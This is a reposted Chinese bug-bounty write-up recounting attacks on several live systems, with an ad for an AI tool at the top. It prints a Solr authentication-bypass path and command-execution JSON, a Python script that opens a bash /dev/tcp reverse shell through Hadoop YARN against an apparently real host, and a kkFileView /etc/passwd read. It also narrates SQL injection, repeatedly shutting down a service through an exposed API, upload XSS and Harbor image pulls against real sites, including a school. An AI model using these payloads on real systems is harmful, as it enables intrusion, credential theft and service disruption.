[SRC]记一次侥幸的捡漏

admin 2026-07-14 05:34:32 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 本文为SRC漏洞挖掘实战经验分享,作者通过未授权访问、命令执行、文件读取等手法,成功发现并利用了ApacheSolr身份认证绕过与命令执行、HadoopYARN未授权访问getshell、kkFileView任意文件读取、越权接口、SQL注入、文件上传XSS及Harbor未授权访问等多个高危漏洞。文章提供了具体漏洞利用方法与POC,强调仅供学习,使用者需自行承担后果。 综合评分: 75 文章分类: 漏洞分析,渗透测试,红队,内网渗透,WEB安全


cover_image

[SRC]记一次侥幸的捡漏

原创

略懂安全的三秋 略懂安全的三秋

略懂安全的三秋

2026年6月6日 16:52 广西

在小说阅读器读本章

去阅读

无问AI远超通用大模型,在网络安全问题理解、代码生成、安全研究分析及其他复杂场景上是你的最佳选择。

链接:https://www.wwlib.cn/index.php/

如果积分不够用可以使用我的积分码,即可领取100积分

兑换链接:https://www.wwlib.cn/index.php/gift

WUWEN_FxWhkLkyuiU01gOL0y

开局未授权起手

这是一个Solr系统,存在命令执行,这里复现一下

Apache Solr身份认证绕过漏洞

/solr/admin/info/properties:/admin/info/key

Apache Solr命令执行

{    "add-listener": {      "event": "postCommit",      "name": "rce1",      "class": "solr.RunExecutableListener",      "exe": "sh",      "dir": "/bin",      "args": ["-c", "id > /opt/solr/server/solr/demo/conf/pwned.txt 2>&1"]    }  }

[{"id":"trigger_1717000000"}]

hadoop未授权访问导致getshell

这里直接使用脚本反弹shell

import requeststarget = 'http://cqcc.5hui.cn:8088/'   # 目标 Hadoop YARN ResourceManager 地址lhost = 'XXX.XXX.XXX.XXX'             # 攻击机 IP(需替换为真实地址)# 1. 请求一个新的 Application IDurl = target + 'ws/v1/cluster/apps/new-application'resp = requests.post(url)app_id = resp.json()['application-id']# 2. 构造恶意应用,执行反弹 Shell 命令url = target + 'ws/v1/cluster/apps'data = {    'application-id': app_id,    'application-name': 'get-shell',    'am-container-spec': {        'commands': {            'command': f'/bin/bash -i >& /dev/tcp/{lhost}/8888 0>&1'        },    },    'application-type': 'YARN',}requests.post(url, json=data)

kkFileView任意文件读取

/getCorsFile?urlPath=file:///etc/passwd

下一个

因为有注册,所以我们注册一手

之后利用雪瞳发现越权接口(现在关登录了,复现有限)

可以获取管理员密码,但加密了

下一个

未授权访问一枚,这里的搜寻存在SQL注入

可以看到’报错,后续发现是报错注入,所以过程多,这里上结果

下一个

这里密码爆破没有成功,所以就只能去跑接口了

这个接口时查看服务的运行

这个接口则是关闭服务,这是一个中间件服务,但他重启的很快,所以要连续发包

可以看到服务关闭了

下一个

这是一个学校的管理网站

这种登录框八成时ruoyi的

弱口令不行就只能跑接口,接口还不行的话,就跑路。

翻js文件找到了未授权的文件上传接口

构造请求包水一枚XSS

下一个

Harbor未授权访问,搜寻框输入/,

后续拉镜像查敏感信息就行了

加纳!

由于传播、利用本公众号所提供的信息而造成``的任何直接或者间接的后果及损失,均由使用``者本人负责,公众号略懂安全的三秋不``为此承担任何责任,一旦造成后果请自行承担!


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:略懂安全的三秋 略懂安全的三秋 略懂安全的三秋《[SRC]记一次侥幸的捡漏》

评论:0   参与:  0